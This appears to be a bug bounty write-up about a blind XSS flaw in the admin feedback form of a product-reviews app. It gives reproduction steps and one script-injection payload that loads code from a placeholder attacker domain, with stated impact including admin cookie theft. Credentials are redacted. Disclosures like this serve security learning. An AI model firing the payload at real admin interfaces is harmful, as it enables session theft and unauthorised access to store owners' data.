Blind XSS Execution From Feedback Form (Finding Can give you $1000+ Bounty)

Hello, Hunters. I know You are here because you are struggling or want to advance in your career. Believe me, things take time. Be consistent, continue to learn, and never deceive yourself. If you follow this three mantras, you will undoubtedly achieve success.

Description:

The admin area is where I discovered Blind XSS. On the installation screen for the default theme, I was attempting to add widgets. I saw a query like that after the installation was complete: “Are you satisfied with how everything looks?” The comment form appeared after I selected the button that read “No, please remove all widgets.” My blind XSS payload was uploaded. It was activated on https://xyz.me/admin, which needs HTTP Basic Authorization, in 10 to 15 minutes. I can gather all of the admin pages but I can’t get the admin session cookie.

Step to Reproduce:
1. Access the page at https://odo-tester.xyz.com/admin and use the test credentials to check in. (Credentials Header contains passwords)

2. Click the Apps tab from the left side and then click Judge.me Product Reviews.

3. Click Add Widgets then Start Installation and continue.

4. When the installation is done. It asks Are you happy with how everything looks?. Choose No, please remove all widgets button. Feedback form appears and put your blind xss payload.

5. Wait for payload Execution.

Supporting Refrences:

Vulnerable Page URL : https://xyz.me/admin/████████ Referer: https://xyz.me/admin/███

Cookies:http ██████████████

Credentials Used:

1. email: ██████████@techmail.com
2. password: ███████
3. tempmail: https://yopmail.com/?judgeme-███████████ ( it can be necessary when you are login )
4. payload: “><script src=https://yourxssdomain></script>

Impact:

The admin area can be accessed through blind XSS. It might have information that has leaked about the reports of other store proprietors. JavaScript code is run on the admin interface. administrative cookie theft.

Thank you for reading !! hope you get to learn some tricks.

Subscribe to the Shuttlertech YouTube channel for more of this type of content and to watch live POCs & To advance your career connect with me 1:1 over topmate .
I will ensure you that i will write more interesting and knowledge sharing writeups, to encourage me follow me on medium and click the clap icon.

Disclaimer: My Writeup come from own achievements & Some time form different Learing Platform Do not use this methodology without concern of company. I am just sharing this for learning purpose.